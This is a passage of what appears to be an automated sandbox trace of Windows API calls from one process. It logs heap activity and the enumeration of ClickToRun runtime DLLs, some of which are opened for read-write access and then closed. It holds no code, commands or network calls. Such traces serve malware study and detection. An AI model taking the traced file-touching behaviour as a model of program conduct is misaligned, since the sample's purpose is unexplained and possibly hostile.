hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0074.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0074.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0074.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0074.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0074.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0074.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0074.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0074.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0074.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0074.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0074.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0074.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.334] AreFileApisANSI () returned 1 [0074.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0074.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0074.334] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.334] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.334] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x50c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="AP0479~1.DLL")) returned 1 [0074.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0074.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.335] AreFileApisANSI () returned 1 [0074.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 95 [0074.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0074.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.336] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0074.336] AreFileApisANSI () returned 1 [0074.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0074.336] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0074.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0074.336] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.336] GetFileType (hFile=0x430) returned 0x1 [0074.336] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.337] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.337] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.337] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.337] CloseHandle (hObject=0x430) returned 1 [0074.337] AreFileApisANSI () returned 1 [0074.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0074.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0074.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0074.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.337] GetFileType (hFile=0x430) returned 0x1 [0074.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.338] CloseHandle (hObject=0x430) returned 1 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.339] AreFileApisANSI () returned 1 [0074.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0074.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0074.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=95 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll") returned 95 [0074.339] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x50c0)) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0074.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.340] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="AP23C9~1.DLL")) returned 1 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 